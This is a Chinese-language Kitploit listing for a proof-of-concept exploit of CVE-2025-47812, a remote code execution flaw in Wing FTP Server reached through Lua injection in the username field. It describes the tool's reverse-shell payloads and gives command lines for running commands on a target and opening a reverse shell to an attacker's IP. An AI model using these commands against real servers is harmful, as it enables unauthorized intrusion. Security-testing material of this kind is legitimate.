Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WingFTP-CVE-2025-47812-illdeed — Wing FTP 服务器 (CVE-2025-47812) 的远程命令执行漏洞利用 | Kitploit
工具/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Wing FTP 服务器 (CVE-2025-47812) 的远程命令执行漏洞利用

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
21年前尚未审核
分享

CVE-2025-47812 - Wing FTP服务器远程代码执行漏洞利用

本仓库提供了针对Wing FTP服务器中CVE-2025-47812(远程代码执行漏洞)的概念验证利用代码。攻击者可以通过在认证过程中滥用username参数注入并执行任意的Lua系统命令,从而实现完全的远程代码执行。


📌 漏洞利用功能特性

  • 🔧 远程执行自定义shell命令
  • 🧬 多个内置的反向shell有效载荷(bash、Python、netcat等)
  • 🪪 从Set-Cookie自动提取UID
  • 📦 将成功的UID记录到found_uids.txt
  • 🧪 试运行模式(不发送实际请求——安全测试输入/输出逻辑)
  • 🔁 网络失败时的重试逻辑
  • 🧹 更清晰的有效载荷格式化和可读输出
  • ✅ IP、端口和URL的输入验证
  • ⚙️ 支持自动化工作流的命令行参数

💻 使用方法

执行简单shell命令:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

触发反向shell:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

试运行模式(不会发送任何请求):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 对原始漏洞利用代码所做的更改

功能/改进描述
✅ 参数解析添加argparse CLI支持,用于非交互模式
🔐 输入验证在尝试利用前确保URL/IP/端口有效
📦 头重构将HTTP头提取为可复用函数以保持一致性
📄 UID日志记录将成功的UID令牌保存到found_uids.txt
🧪 试运行模式允许在没有发送请求的情况下安全测试(--dry-run)
🕒 超时+重试添加请求超时和失败时自动重试
🧼 有效载荷可读性重新格式化Lua注入字符串以提高清晰度和可维护性
📊 结构化输出用分隔符包裹服务器响应和有效载荷信息,便于读取
⚠️ 状态码检查如果目标返回意外的HTTP状态码,向用户发出警告
📝 日志系统用Python logging模块替换print(),更好地控制详细程度

⚠️ 免责声明

本项目仅用于教育和授权的安全测试。
请不要在您不拥有或未经明确许可的系统上使用此工具。


下载工具